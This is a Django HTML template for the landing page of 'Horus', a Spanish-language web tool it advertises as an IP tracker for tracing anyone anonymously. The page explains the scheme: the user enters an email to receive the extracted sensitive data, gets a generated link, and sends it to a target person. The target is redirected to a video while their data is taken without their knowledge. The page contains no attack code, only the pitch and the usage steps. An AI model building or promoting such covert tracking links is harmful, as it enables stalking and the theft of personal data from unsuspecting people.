{% extends 'base/base.html' %}

{% load static %}

{% block title %} {% endblock %}

{% block header %} 

{% endblock %}

{% block content %}
    <main class="px-10">
        <h5>¡Bienvenido a Horus!</h5>   
        <p class="lead">Rastrea a quien sea de manera anonima y sutil con solo un ¡Click! ;)</p>
        <h5>¿Que es Horus?</h5>
        <p class="lead">Horus es un rastreador de IP en el que se extraen datos sensibles de alguna persona en particular</p>
        <h5>¿Como utlizo Horus?</h5>
        <p class="lead" >Usar horus es extremadamente sencillo, solo basta con ir al apartado de "Observar". En este apartado deberas poner un correo que es a donde llegaran los datos extraidos,
            una vez pongas un correo se generara un link que sera tu "Observador" este link deberas pasarlo a tu objetivo(Persona) y una vez esta haga click al Link sera redigirido a un video iconico y no sabra que sus datos ahora son tuyos ;)</p>
    </main>

{% endblock %}